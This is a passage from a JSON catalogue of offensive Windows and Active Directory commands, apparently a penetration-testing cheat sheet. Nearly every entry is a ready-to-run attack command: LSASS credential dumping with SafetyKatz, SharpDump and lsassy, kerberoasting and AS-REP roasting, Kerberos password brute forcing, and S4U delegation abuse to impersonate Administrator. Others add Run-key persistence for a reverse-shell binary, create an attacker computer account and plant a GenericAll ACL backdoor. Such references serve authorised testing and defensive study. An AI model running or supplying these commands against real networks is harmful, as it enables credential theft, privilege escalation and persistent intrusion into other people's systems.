arbitrary payload during logon or startup. Keys added to the HKLM hive will execute on startup. Keys added to the HKCU hive will execute when the corresponding user logs on. Adding keys into the HKLM hive will require an elevated shell. There are four keys that can be used: Run, RunOnce, RunServices, and RunServicesOnce. By default, a RunOnce key is deleted after the specified command is executed. The path for these keys is the same for the HKLM and HKCU hives.\n\nCommand Reference:\n\n\tValue Name: Persistence\n\n\tRegKey data type: REG_SZ\n\n\tData: \"C:\\Path\\To\\revshell.exe\"\n\n\tKeyName: \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"\n","mitre":[],"requires":["Shell"],"references":["https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/","https://www.hackingarticles.in/windows-persistence-using-winlogon/","https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg","https://docs.microsoft.com/en-us/windows-hardware/drivers/install/runonce-registry-key"],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Responder-Analyze","toolId":"wadcoms:Responder","toolName":"Responder","name":"Responder-Analyze","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"Responder -I eth0 -A","description":"Responder is an LLMNR, NBT-NS, and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix. By default, the tool will only answer to File Server Service request, which is for SMB. The following command will put Responder in analyze mode, listening for NBT-NS, BROWSER, and LLMNR requests without responding.\n\nCommand Reference:\n\n\tInterface: eth0\n","mitre":[],"requires":["No credentials"],"services":["NTLM","SMB"],"references":["https://github.com/lgandx/Responder","https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Rubeus-ASREPRoast","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-ASREPRoast","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt","description":"Rubeus' `asreproast` module will attempt to harvest the non-preauth AS_REP responses for a given list of usernames. These responses will be encrypted with the user's password, which can then be cracked offline. The following command is run on a Windows machine in the victim domain.\n\nCommand Reference:\n\n\tOutput File: hashes.txt\n","mitre":[],"requires":["Shell"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://github.com/GhostPack/Rubeus#asreproast"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Rubeus-AskTGT","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-AskTGT","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"Rubeus.exe asktgt /domain:test.local /user:john /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt","description":"Rubeus' `asktgt` module uses a valid user's NTLM hash to request Kerberos tickets, in order to access any service or machine where that user has permissions.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tHash: 2a3de7fe356ee524cc9f3d579f2e0aa7\n","mitre":[],"requires":["NTLM hash","Username"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://github.com/GhostPack/Rubeus#asktgt"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Rubeus-Brute","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Brute","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"Rubeus.exe /users:usernames.txt /passwords:passwords.txt /domain:test.local /outfile:found_passwords.txt","description":"Rubeus' `brute` module bruteforces and enumerates valid Active Directory accounts through Kerberos Pre-Authentication. The following command will attempt to brute force valid username and passwords logins given a list of usernames and a list of passwords.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername List: usernames.txt\n\n\tPassword List: passwords.txt\n\n\tOutput File: found_passwords.txt\n","mitre":[],"requires":["No credentials"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://github.com/GhostPack/Rubeus#brute"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Rubeus-Kerberoast","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Kerberoast","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"Rubeus.exe kerberoast /outfile:hashes.txt","description":"Rubeus' `kerberoast` module will attempt to fetch Service Principal Names that are associated with normal user accounts. What is returned is a ticket that is encrypted with the user account's password, which can then be bruteforced offline. The following command is run on a Windows machine in the victim domain.\n\nCommand Reference:\n\n\tOutput File: hashes.txt\n","mitre":[],"requires":["Shell"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://github.com/GhostPack/Rubeus#kerberoast"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Rubeus-s4u","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-s4u","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Execution","Lateral Movement"],"nativeCategory":["Exploitation","Lateral Movement","Privilidge Escalation"],"command":"Rubeus.exe s4u /user:john$ /aes256:2a3de7fe356ee524cc9f3d579f2e0aa7 /impersonateuser:Administrator /msdsspn:time/dc.test.local /altservice:ldap /ptt","description":"Rubeus' `s4u` module performs Kerberos constrained delegation attacks using the S4U2Self and S4U2Proxy. This technique abuses accounts configured with delegation privileges (msDS-AllowedToDelegateTo) to impersonate any domain user and further alter the service specified since SPNs are stored in plaintext and thus access any service on the target system as any user\n\nCommand Reference:\n\n\tDomain: test.local\n\n SPN: time/dc.test.local\n\n alternative service: ldap(can chose any valid services such as HTTP for remoting access)\n\n\tUsername: john$\n\n\tHash: 2a3de7fe356ee524cc9f3d579f2e0aa7\n","mitre":[],"requires":["NTLM hash","Username"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/credential-access/steal-or-forge-kerberos-tickets/constrained-delegation","https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:SMBClient-Enum-Share-Anonymous","toolId":"wadcoms:SMBClient","toolName":"SMBClient","name":"SMBClient-Enum-Share-Anonymous","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"smbclient \\\\\\\\test.local\\\\public -I 10.10.10.1 -N","description":"Smbclient is a tool used to communicate with SMB servers. The following command will connect to an SMB share `public` using anonymous login.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tSMB Share: public\n","mitre":[],"requires":["No credentials"],"services":["SMB"],"references":["https://www.samba.org/samba/docs/current/man-html/smbclient.1.html","https://www.madirish.net/59"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:SMBClient-Enum-Share","toolId":"wadcoms:SMBClient","toolName":"SMBClient","name":"SMBClient-Enum-Share","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"smbclient \\\\\\\\test.local\\\\C$ -I 10.10.10.1 -U john password123","description":"Smbclient is a tool used to communicate with SMB servers. The following command will connect to an SMB share `C$` using valid credentials.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tSMB Share: C$\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://www.samba.org/samba/docs/current/man-html/smbclient.1.html","https://www.madirish.net/59"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:SMBClient-List-Share-PTH","toolId":"wadcoms:SMBClient","toolName":"SMBClient","name":"SMBClient-List-Share-PTH","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"smbclient -L \\\\10.10.10.1 -U test.local/john --pw-nt-hash XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","description":"Smbclient is a tool used to communicate with SMB servers. The following command will list out all available shares on the target ip using user John hash on test domain.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tHash: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\n","mitre":[],"requires":["Username","NTLM hash"],"services":["SMB"],"references":["https://www.samba.org/samba/docs/current/man-html/smbclient.1.html"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:SMBClient-List-Shares-Anonymous","toolId":"wadcoms:SMBClient","toolName":"SMBClient","name":"SMBClient-List-Shares-Anonymous","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"smbclient -L \\\\test.local -I 10.10.10.1 -N","description":"Smbclient is a tool used to communicate with SMB servers. The following command will list out all available shares on the target server using anonymous login.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n","mitre":[],"requires":["No credentials"],"services":["SMB"],"references":["https://www.samba.org/samba/docs/current/man-html/smbclient.1.html"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:SMBClient-List-Shares","toolId":"wadcoms:SMBClient","toolName":"SMBClient","name":"SMBClient-List-Shares","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"smbclient -L \\\\test.local -I 10.10.10.1 -U john password123","description":"Smbclient is a tool used to communicate with SMB servers. The following command will list out all available shares on the target server using valid credentials.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://www.samba.org/samba/docs/current/man-html/smbclient.1.html"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:SMBMap-Enum-File","toolId":"wadcoms:SMBMap","toolName":"SMBMap","name":"SMBMap-Enum-File","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"python3 smbmap.py --host-file smb-hosts.txt -u john -p 'password123' -d test.local -F password","description":"SMBMap is a tool used to enumerate SMB share drives, including listing share drive permissions, share contents, upload/download functionality, file name enumeration, and remote command execution. The following command will enumerate a list of SMB hosts for files and filenames containing the keyword 'password'.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tSMB Hosts: smb-hosts.txt\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/ShawnDEvans/smbmap","https://www.nopsec.com/blog/smbmap-wield-it-like-the-creator/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:SMBMap-Enum-Share-Anonymous","toolId":"wadcoms:SMBMap","toolName":"SMBMap","name":"SMBMap-Enum-Share-Anonymous","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"python3 smbmap.py --host-file smb-hosts.txt -d test.local -L","description":"SMBMap is a tool used to enumerate SMB share drives, including listing share drive permissions, share contents, upload/download functionality, file name enumeration, and remote command execution. The following command will enumerate a list of SMB hosts for accessible SMB shares, both local and mapped drives, without credentials (null session).\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tSMB Hosts: smb-hosts.txt\n","mitre":[],"requires":["No credentials"],"services":["SMB"],"references":["https://github.com/ShawnDEvans/smbmap","https://www.nopsec.com/blog/smbmap-wield-it-like-the-creator/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:SMBMap-Enum-Share","toolId":"wadcoms:SMBMap","toolName":"SMBMap","name":"SMBMap-Enum-Share","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"python3 smbmap.py --host-file smb-hosts.txt -u john -p 'password123' -d test.local -L","description":"SMBMap is a tool used to enumerate SMB share drives, including listing share drive permissions, share contents, upload/download functionality, file name enumeration, and remote command execution. The following command will enumerate a list of SMB hosts for accessible SMB shares, both local and mapped drives, using valid credentials.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tSMB Hosts: smb-hosts.txt\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/ShawnDEvans/smbmap","https://www.nopsec.com/blog/smbmap-wield-it-like-the-creator/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:SafetyKatz","toolId":"wadcoms:SafetyKatz","toolName":"SafetyKatz","name":"SafetyKatz","source":"WADComs","platform":["Windows"],"capability":["Privilege Escalation","Enumeration"],"nativeCategory":["PrivEsc","Enumeration"],"command":"safetykatz.exe \"privilege::debug\" \"sekurlsa::evasive-logonpasswords\" \"exit\"","description":"SafetyKatz.exe is part of the GhostPack suite of tools and is a combination of SharpDump and Mimikatz. The following command will dump the LSASS process and run Mimikatz to extract credentials from the dumped process. Safetykatz also supports a number of mimikatz native commands such as \"sekurlsa::evasive-keys\" etc. The evasive switch in lab and production enviroments up to windows 2016 has been noted to successfully run where the non \"evasive\" switches had not\n","mitre":[],"requires":["Shell"],"references":["https://github.com/GhostPack/SafetyKatz","https://www.harmj0y.net/blog/redteaming/ghostpack/"],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Seatbelt","toolId":"wadcoms:Seatbelt","toolName":"Seatbelt","name":"Seatbelt","source":"WADComs","platform":["Windows"],"capability":["Privilege Escalation","Persistence"],"nativeCategory":["PrivEsc","Persistence"],"command":"Seatbelt.exe -group=all -full > output.txt","description":"Seatbelt.exe is part of the GhostPack suite of tools that will perform a lot of \"safety checks\" on the Windows host and collect system data that could be useful for potential privilege escalation or persistence methods. The following command will run all checks on the system and store the output in a file (WARNING: will collect a lot of data. remove `-full` for less output).\n\nCommand Reference:\n\n\tRun all checks: -group=all\n\n\tOutput File: output.txt\n","mitre":[],"requires":["Shell"],"references":["https://github.com/GhostPack/Seatbelt","https://www.harmj0y.net/blog/redteaming/ghostpack/"],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:SharpDump","toolId":"wadcoms:SharpDump","toolName":"SharpDump","name":"SharpDump","source":"WADComs","platform":["Windows"],"capability":["Privilege Escalation","Enumeration"],"nativeCategory":["PrivEsc","Enumeration"],"command":"SharpDump.exe","description":"SharpDump.exe is part of the GhostPack suite of tools and is a C# port of PowerSploit's Out-Minidump.ps1. It can dump the process for LSASS or a specific process given it's PID. This dump can then be fed into mimikatz to extract sensitive information. The following command simply dumps the LSASS process.\n","mitre":[],"requires":["Shell"],"references":["https://github.com/GhostPack/SharpDump","https://www.harmj0y.net/blog/redteaming/ghostpack/"],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:SharpHound-LDAP","toolId":"wadcoms:SharpHound","toolName":"SharpHound","name":"SharpHound-LDAP","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Enumeration"],"nativeCategory":["PrivEsc","Enumeration"],"command":"SharpHound.exe --CollectionMethods All --LdapUsername john --LdapPassword password123 --ZipFileName output.zip","description":"SharpHound.exe is the official data collector for BloodHound, written in C# and uses Windows API functions and LDAP namespace functions to collect data from domain controllers and domain-joined Windows systems. This data can then be fed into BloodHound to enumerate potential paths of privilege escalation. The following command peforms all collection methods and will use the provided LDAP credentials when performing LDAP collection methods, and stores the output in a zip file that can be directly placed in the BloodHound GUI.\n\nCommand Reference:\n\n\tLDAP Username: john\n\n\tLDAP Password: password123\n\n\tOutput File: output.zip\n","mitre":[],"requires":["Shell","Username","Password"],"services":["LDAP"],"references":["https://github.com/BloodHoundAD/SharpHound3","https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound.html"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:SharpHound","toolId":"wadcoms:SharpHound","toolName":"SharpHound","name":"SharpHound","source":"WADComs","platform":["Windows"],"capability":["Privilege Escalation","Enumeration"],"nativeCategory":["PrivEsc","Enumeration"],"command":"SharpHound.exe --CollectionMethods All --ZipFileName output.zip\n#Using PowerShell module\npowershell -ep bypass \n.\\SharpHound.ps1\nInvoke-BloodHound -CollectionMethod All -Domain domain.tld -ZipFileName output.zip","description":"SharpHound.exe and SharpHound.ps1 are the official data collector for BloodHound, written in C# or Powershell and uses Windows API functions and LDAP namespace functions to collect data from domain controllers and domain-joined Windows systems. This data can then be fed into BloodHound to enumerate potential paths of privilege escalation. The following command peforms all collection methods and stores the output in a zip file that can be directly placed in the BloodHound GUI.\n\nCommand Reference:\n\n\tOutput File: output.zip\n","mitre":[],"requires":["Shell"],"references":["https://github.com/BloodHoundAD/SharpHound3","https://bloodhound.specterops.io/collect-data/ce-collection/sharphound","https://github.com/ZishanAdThandar/pentest/blob/main/notes/ActiveDirectory.md#bloodhound"],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:SharpLDAPmonitor","toolId":"wadcoms:SharpLDAPmonitor","toolName":"SharpLDAPmonitor","name":"SharpLDAPmonitor","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"SharpLDAPmonitor.exe /dcip:10.10.10.1 /user:TEST.local\\john /pass:password123","description":"SharpLDAPmonitor.exe allows you to monitor creation, deletion and changes to LDAP objects live during your pentest.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tAttacker IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["LDAP","Kerberos","NTLM"],"references":["https://github.com/p0dalirius/LDAPmonitor/tree/master/csharp"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:SharpUp","toolId":"wadcoms:SharpUp","toolName":"SharpUp","name":"SharpUp","source":"WADComs","platform":["Windows"],"capability":["Privilege Escalation"],"nativeCategory":["PrivEsc"],"command":"SharpUp.exe > output.txt","description":"SharpUp.exe is part of the GhostPack suite of tools and is a C# port of PowerUp that will perform numerous privilege escalation checks. The following command will run all priv esc checks and store the output in a file.\n\nCommand Reference:\n\n\tOutput File: output.txt\n","mitre":[],"requires":["Shell"],"references":["https://github.com/GhostPack/SharpUp","https://www.harmj0y.net/blog/redteaming/ghostpack/"],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:SharpWMI","toolId":"wadcoms:SharpWMI","toolName":"SharpWMI","name":"SharpWMI","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Persistence"],"nativeCategory":["Persistence"],"command":"SharpWMI.exe action=query query=\"select * from win32_process\"","description":"SharpWMI.exe is part of the GhostPack suite of tools that provides WMI functionality, such as local/remote WMI queries, remote WMI process creation, and remote execution of arbitrary VBS through WMI events. The following command will simply list all processes running on the local system.\n\nCommand Reference:\n\n\tGet all processes: \"select * from win32_process\"\n","mitre":[],"requires":["Shell"],"services":["WMI"],"references":["https://github.com/GhostPack/SharpWMI","https://www.harmj0y.net/blog/redteaming/ghostpack/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Snaffler","toolId":"wadcoms:Snaffler","toolName":"Snaffler","name":"Snaffler","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"Snaffler.exe -s -o snaffler_output.log -d test.local -c 10.10.10.1","description":"Snaffler is a tool used to enumerate sensitive data (passwords, PII, etc.) from file shares in Active Directory. It searches for interesting files based on file extensions, file names, and file content that's matched against regex. It's also highly configurable, allowing you to add your own regex searches. The following command will enumerate all machines in the domain and search for accessible file shares, checking for interesting files that might have sensitive data.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tDomain Controller: 10.10.10.1\n","mitre":[],"requires":["Shell"],"services":["SMB"],"references":["https://github.com/SnaffCon/Snaffler"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Windapsearch","toolId":"wadcoms:Windapsearch","toolName":"Windapsearch","name":"Windapsearch","source":"WADComs","platform":["Linux","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"python3 windapsearch --dc-ip 10.10.10.1 -u test.local\\\\john -p password123 -U -G --da -m \"Remote Desktop Users\" -C -r","description":"windapsearch enumerates users, groups, and computers from a Windows domain through LDAP queries. The following command enumerates all 3 of the above mentioned using provided credentials.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tEnum Users: -U\n\n\tEnum Groups: -G\n\n\tEnum Domain Admins: --da\n\n\tEnum members of group: -m \"Remote Desktop Users\"\n\n\tEnum Computers and resolve DNS: -C -r\n","mitre":[],"requires":["Username","Password"],"references":["https://github.com/ropnop/windapsearch","https://www.attackdebris.com/?p=470"],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:bloodyAD-Wite-Properties","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-Wite-Properties","source":"WADComs","platform":["Linux"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"bloodyAD --host 10.10.10.1 -d test.local -u john -p password123 -d test.local get writable --detail","description":"BloodyAD can be used to set, write and delete properties of objects in AD. Given a user:pass, you can use bloodyAD to which objects and what properties of\nthose objects are writeable to the user:pass given. Thus if you use -u john -p john, this command will show you what objects and properties\ncan john write to\n\nCommand Reference:\n Target IP: 10.10.10.1\n\n\tDomain: test.local\n\n Username: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"references":["https://github.com/CravateRouge/bloodyAD","https://adminions.ca/books/active-directory-enumeration-and-exploitation/page/bloodyad"],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:enum4linux-ng","toolId":"wadcoms:Enum4Linux","toolName":"Enum4Linux","name":"enum4linux-ng","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"enum4linux-ng 10.10.10.1","description":"enum4linux-ng is a modern reimplementation of enum4linux written in Python3. It is used to enumerate information from Windows and Samba systems, providing cleaner output and better support for modern protocols. The following command performs a full unauthenticated enumeration of the target.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n","mitre":[],"requires":["No credentials"],"services":["SMB"],"references":["https://github.com/cddmp/enum4linux-ng"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:lsassy-credsdump","toolId":"wadcoms:lsassy","toolName":"lsassy","name":"lsassy-credsdump","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"lsassy -u john -p password123 -d test.local 10.10.10.1","description":"\"lsassy is a tool written in python released in 2021 to provide a varity of methods to dump credintials from a single/multiple remote targets. It uses a varity of differnt tactics that provide OPSEC benefits in some cases while also providing the operator options in how it executes remotely, which method it uses as well as the ability to replace the inbuild binaries with your own very easily. Note that if you had introduced nxc into the enviroment previously, then youre encouraged for OSPEC gains to use the built in lsass module. This holds true for many sources in this project that if you had introduced x y z tool; you are better off continuing to use those instead of constantly introducing new ones\"\n\nCommand reference:\n Password: password123\n Username: john\n Domain: test.local\n Target: 10.10.10.1\n","mitre":[],"requires":["Username","Password"],"services":["Kerberos","NTLM"],"references":["https://en.hackndo.com/remote-lsass-dump-passwords/","https://github.com/login-securite/lsassy?tab=readme-ov-file"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:targetedKerberoast","toolId":"wadcoms:targetedKerberoast","toolName":"targetedKerberoast","name":"targetedKerberoast","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 targetedKerberoast.py -d test.local -u john -p password123 --dc-ip 10.10.10.1","description":"targetedKerberoast is a Python script that can, like many others (e.g. GetUserSPNs.py), print \"kerberoast\" hashes for user accounts that have a SPN set. This tool brings the following additional feature: for each user without SPNs, it tries to set one (abuse of a write permission on the servicePrincipalName attribute), print the \"kerberoast\" hash, and delete the temporary SPN set for that operation.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tAttacker IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["Kerberos","NTLM"],"references":["https://github.com/ShutdownRepo/targetedKerberoast"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:winPEAS","toolId":"wadcoms:winPEAS","toolName":"winPEAS","name":"winPEAS","source":"WADComs","platform":["Windows"],"capability":["Privilege Escalation"],"nativeCategory":["PrivEsc"],"command":"winpeas.exe cmd > output.txt","description":"winpeas.exe is a script that will search for all possible paths to escalate privileges on Windows hosts. The below command will run all priv esc checks and store the output in a file.\n\nCommand Reference:\n\n\tRun all checks: cmd\n\n\tOutput File: output.txt\n","mitre":[],"requires":["Shell"],"references":["https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS","https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASexe/README.md","https://book.hacktricks.xyz/windows/windows-local-privilege-escalation"],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:adidnsdump-Enum","toolId":"wadcoms:adidnsdump","toolName":"adidnsdump","name":"adidnsdump-Enum","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# List available DNS zones\nadidnsdump -u 'test.local\\john' -p password123 --print-zones ldap://10.10.10.1\n# Dump the default zone; -r resolves nodes hidden from the unauthenticated listing (records.csv)\nadidnsdump -u 'test.local\\john' -p password123 -r ldap://10.10.10.1","description":"adidnsdump (dirkjanm) abuses the fact that any authenticated domain user can read the AD-integrated DNS zones (stored in the DomainDnsZones/ForestDnsZones partitions), effectively performing a zone transfer without being a DNS admin. Records whose node name is hidden from the anonymous listing are still enumerable and can be resolved by adding -r, which issues a live DNS query for each hidden node. This maps internal hostnames to IPs for target selection; results are written to records.csv. Use --print-zones first to see which zones exist.\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tDomain: test.local\n\tTarget DC IP: 10.10.10.1","mitre":["T1590.002"],"requires":["Username","Password"],"services":["DNS","LDAP"],"references":["https://github.com/dirkjanm/adidnsdump","https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/","https://attack.mitre.org/techniques/T1590/002/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:bloodyAD-AddComputer","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-AddComputer","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"# Create a computer account (returns the new SAM account name and password)\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add computer EVILPC 'Password123!'","description":"bloodyAD's `add computer` action creates a new machine account in the domain over LDAP. Any authenticated user can create up to ms-DS-MachineAccountQuota (default 10) computer accounts, so this is a reliable way to obtain an attacker-controlled principal for RBCD, shadow-credential, or S4U abuse chains. The created computer account has a known password you control. Check the MachineAccountQuota before use; a value of 0 blocks this.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:bloodyAD-AddGenericAll","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-AddGenericAll","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Persistence","Execution"],"nativeCategory":["PrivEsc","Persistence","Exploitation"],"command":"# Grant john GenericAll over the victim object\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add genericAll victim john","description":"bloodyAD's `add genericAll` action writes a new ACE granting a trustee full control (GenericAll) over a target object's DACL via LDAP. Use it to escalate a lesser right (WriteDacl / WriteOwner) into full control over a user, group, or computer, or to establish a durable ACL backdoor for persistence. Once 